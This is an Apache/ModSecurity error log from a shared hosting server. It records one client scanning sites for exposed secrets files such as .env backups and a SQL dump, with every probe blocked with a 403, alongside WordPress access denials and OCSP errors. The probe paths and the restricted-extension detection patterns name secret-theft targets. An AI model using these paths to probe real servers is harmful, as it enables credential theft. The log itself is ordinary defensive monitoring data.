[Mon May 11 11:33:51.604402 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:14300] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/shop/.env.bak.src"] [unique_id "agGif2S6k_SCYd1AVZqoyAAAAQg"]
[Mon May 11 11:33:52.803316 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:14300] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGif2S6k_SCYd1AVZqoyAAAAQg"]
[Mon May 11 11:33:57.743773 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:7534] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /spec/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/spec/.env.bak"] [unique_id "agGihURdw2n9wv6Ai48BxAAAAJU"]
[Mon May 11 11:33:57.744085 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:7534] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/spec/.env.bak"] [unique_id "agGihURdw2n9wv6Ai48BxAAAAJU"]
[Mon May 11 11:33:59.000575 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:7534] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGihURdw2n9wv6Ai48BxAAAAJU"]
[Mon May 11 11:33:59.026110 2026] [security2:error] [pid 1254328:tid 1254349] [client 185.177.72.9:7544] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /spec/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/spec/.env.bak"] [unique_id "agGih0Rdw2n9wv6Ai48BxwAAAJM"]
[Mon May 11 11:33:59.026337 2026] [security2:error] [pid 1254328:tid 1254349] [client 185.177.72.9:7544] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/spec/.env.bak"] [unique_id "agGih0Rdw2n9wv6Ai48BxwAAAJM"]
[Mon May 11 11:34:00.230291 2026] [security2:error] [pid 1254328:tid 1254349] [client 185.177.72.9:7544] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGih0Rdw2n9wv6Ai48BxwAAAJM"]
[Mon May 11 11:34:03.525727 2026] [authz_core:error] [pid 1254133:tid 1254140] [client 88.88.156.124:41792] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/error_log
[Mon May 11 11:34:05.045672 2026] [authz_core:error] [pid 1254133:tid 1254140] [client 88.88.156.124:41792] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/error_log
[Mon May 11 11:34:05.140543 2026] [security2:error] [pid 1254328:tid 1254334] [client 185.177.72.9:53200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /specs/.env.config.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/specs/.env.config.stage"] [unique_id "agGijURdw2n9wv6Ai48BzAAAAIM"]
[Mon May 11 11:34:05.141045 2026] [security2:error] [pid 1254328:tid 1254334] [client 185.177.72.9:53200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/specs/.env.config.stage"] [unique_id "agGijURdw2n9wv6Ai48BzAAAAIM"]
[Mon May 11 11:34:06.359900 2026] [security2:error] [pid 1254328:tid 1254334] [client 185.177.72.9:53200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGijURdw2n9wv6Ai48BzAAAAIM"]
[Mon May 11 11:34:06.384824 2026] [security2:error] [pid 1254212:tid 1254231] [client 185.177.72.9:53216] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /specs/.env.config.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/specs/.env.config.stage"] [unique_id "agGijkYQeUtAPynIs6xSiwAAABE"]
[Mon May 11 11:34:06.385067 2026] [security2:error] [pid 1254212:tid 1254231] [client 185.177.72.9:53216] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/specs/.env.config.stage"] [unique_id "agGijkYQeUtAPynIs6xSiwAAABE"]
[Mon May 11 11:34:06.430572 2026] [authz_core:error] [pid 1254133:tid 1254140] [client 88.88.156.124:41792] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/error_log
[Mon May 11 11:34:07.649039 2026] [security2:error] [pid 1254212:tid 1254231] [client 185.177.72.9:53216] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGijkYQeUtAPynIs6xSiwAAABE"]
[Mon May 11 11:34:07.680426 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:53218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /specs/.env.config_new"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/specs/.env.config_new"] [unique_id "agGij74KNmD_mZ_vlf8y4AAAAEY"]
[Mon May 11 11:34:07.681021 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:53218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/specs/.env.config_new"] [unique_id "agGij74KNmD_mZ_vlf8y4AAAAEY"]
[Mon May 11 11:34:08.126078 2026] [authz_core:error] [pid 1254133:tid 1254140] [client 88.88.156.124:41792] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/error_log
[Mon May 11 11:34:09.854037 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:53218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGij74KNmD_mZ_vlf8y4AAAAEY"]
[Mon May 11 11:34:09.886448 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:53226] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /specs/.env.config_new"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/specs/.env.config_new"] [unique_id "agGikUYQeUtAPynIs6xSkQAAAAE"]
[Mon May 11 11:34:09.886782 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:53226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/specs/.env.config_new"] [unique_id "agGikUYQeUtAPynIs6xSkQAAAAE"]
[Mon May 11 11:34:11.412574 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:53226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGikUYQeUtAPynIs6xSkQAAAAE"]
[Mon May 11 11:34:13.889396 2026] [security2:error] [pid 1256241:tid 1256256] [client 185.177.72.9:52274] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /spring/.env.development_test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/spring/.env.development_test"] [unique_id "agGilZkIEwRJMyDaV55IogAAAUo"]
[Mon May 11 11:34:13.889700 2026] [security2:error] [pid 1256241:tid 1256256] [client 185.177.72.9:52274] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/spring/.env.development_test"] [unique_id "agGilZkIEwRJMyDaV55IogAAAUo"]
[Mon May 11 11:34:15.056254 2026] [security2:error] [pid 1256241:tid 1256256] [client 185.177.72.9:52274] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGilZkIEwRJMyDaV55IogAAAUo"]
[Mon May 11 11:34:15.082756 2026] [security2:error] [pid 1254212:tid 1254224] [client 185.177.72.9:52286] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /spring/.env.development_test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/spring/.env.development_test"] [unique_id "agGil0YQeUtAPynIs6xSlAAAAAo"]
[Mon May 11 11:34:15.083151 2026] [security2:error] [pid 1254212:tid 1254224] [client 185.177.72.9:52286] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/spring/.env.development_test"] [unique_id "agGil0YQeUtAPynIs6xSlAAAAAo"]
[Mon May 11 11:34:15.652830 2026] [ssl:error] [pid 1254179:tid 1254188] (EAI 2)Name or service not known: [client 157.55.39.223:54869] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 11:34:15.652882 2026] [ssl:error] [pid 1254179:tid 1254188] AH01941: stapling_renew_response: responder error
[Mon May 11 11:34:16.354015 2026] [security2:error] [pid 1254212:tid 1254224] [client 185.177.72.9:52286] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGil0YQeUtAPynIs6xSlAAAAAo"]
[Mon May 11 11:34:17.332267 2026] [security2:error] [pid 1256241:tid 1256254] [client 43.156.127.60:44272] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "labaujue.com"] [uri "/"] [unique_id "agGimZkIEwRJMyDaV55IrQAAAUg"]
[Mon May 11 11:34:22.659141 2026] [authz_core:error] [pid 1254212:tid 1254220] [client 88.88.156.124:59788] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Argument/error_log
[Mon May 11 11:34:23.434308 2026] [security2:error] [pid 1254179:tid 1254205] [client 43.156.127.60:51284] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/"] [unique_id "agGin2S6k_SCYd1AVZqo7QAAARg"], referer: http://labaujue.com
[Mon May 11 11:34:24.581698 2026] [authz_core:error] [pid 1254212:tid 1254220] [client 88.88.156.124:59788] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Argument/error_log
[Mon May 11 11:34:26.054698 2026] [authz_core:error] [pid 1254212:tid 1254220] [client 88.88.156.124:59788] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Argument/error_log
[Mon May 11 11:34:27.549425 2026] [authz_core:error] [pid 1254212:tid 1254220] [client 88.88.156.124:59788] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Argument/error_log
[Mon May 11 11:34:33.831501 2026] [:error] [pid 1254242:tid 1254257] [client 35.175.112.13:10845] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 11:34:34.032772 2026] [:error] [pid 1254133:tid 1254151] [client 35.175.112.13:24369] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 11:34:34.046383 2026] [:error] [pid 1254328:tid 1254340] [client 35.175.112.13:17882] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 11:34:34.240952 2026] [:error] [pid 1254242:tid 1254247] [client 35.175.112.13:43941] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 11:34:34.599435 2026] [:error] [pid 1254133:tid 1254157] [client 35.175.112.13:33630] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 11:34:34.607905 2026] [:error] [pid 1254328:tid 1254399] [client 35.175.112.13:31716] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 11:34:36.250481 2026] [security2:error] [pid 1254133:tid 1254147] [client 185.177.72.9:2640] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "jeanboyault.fr"] [uri "/sql_dump.sql"] [unique_id "agGirBjZymfuKpjWXeh24gAAAMs"]
[Mon May 11 11:34:36.252718 2026] [security2:error] [pid 1254133:tid 1254147] [client 185.177.72.9:2640] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/sql_dump.sql"] [unique_id "agGirBjZymfuKpjWXeh24gAAAMs"]
[Mon May 11 11:34:36.959104 2026] [ssl:error] [pid 1256241:tid 1256251] (EAI 2)Name or service not known: [client 3.80.110.46:44974] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 11:34:36.959137 2026] [ssl:error] [pid 1256241:tid 1256251] AH01941: stapling_renew_response: responder error
[Mon May 11 11:34:36.961650 2026] [ssl:error] [pid 1254212:tid 1254218] (EAI 2)Name or service not known: [client 3.80.110.46:26761] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 11:34:36.961672 2026] [ssl:error] [pid 1254212:tid 1254218] AH01941: stapling_renew_response: responder error
[Mon May 11 11:34:36.963019 2026] [ssl:error] [pid 1254133:tid 1254148] (EAI 2)Name or service not known: [client 3.80.110.46:20424] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 11:34:36.963047 2026] [ssl:error] [pid 1254133:tid 1254148] AH01941: stapling_renew_response: responder error
[Mon May 11 11:34:37.033828 2026] [ssl:error] [pid 1254179:tid 1254188] (EAI 2)Name or service not known: [client 3.80.110.46:48698] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 11:34:37.033854 2026] [ssl:error] [pid 1254179:tid 1254188] AH01941: stapling_renew_response: responder error
[Mon May 11 11:34:37.035859 2026] [ssl:error] [pid 1254242:tid 1254252] (EAI 2)Name or service not known: [client 3.80.110.46:7397] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 11:34:37.035895 2026] [ssl:error] [pid 1254242:tid 1254252] AH01941: stapling_renew_response: responder error
[Mon May 11 11:34:37.245517 2026] [ssl:error] [pid 1254133:tid 1254136] (EAI 2)Name or service not known: [client 3.80.110.46:55785] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 11:34:37.245542 2026] [ssl:error] [pid 1254133:tid 1254136] AH01941: stapling_renew_response: responder error
[Mon May 11 11:34:37.246421 2026] [ssl:error] [pid 1254328:tid 1254339] (EAI 2)Name or service not known: [client 3.80.110.46:7747] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 11:34:37.246456 2026] [ssl:error] [pid 1254328:tid 1254339] AH01941: stapling_renew_response: responder error
[Mon May 11 11:34:37.248569 2026] [ssl:error] [pid 1254179:tid 1254185] (EAI 2)Name or service not known: [client 3.80.110.46:5983] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 11:34:37.248589 2026] [ssl:error] [pid 1254179:tid 1254185] AH01941: stapling_renew_response: responder error
[Mon May 11 11:34:37.319896 2026] [ssl:error] [pid 1254212:tid 1254233] (EAI 2)Name or service not known: [client 3.80.110.46:20781] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 11:34:37.319947 2026] [ssl:error] [pid 1254212:tid 1254233] AH01941: stapling_renew_response: responder error
[Mon May 11 11:34:37.324067 2026] [ssl:error] [pid 1256241:tid 1256269] (EAI 2)Name or service not known: [client 3.80.110.46:2123] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 11:34:37.324099 2026] [ssl:error] [pid 1256241:tid 1256269] AH01941: stapling_renew_response: responder error
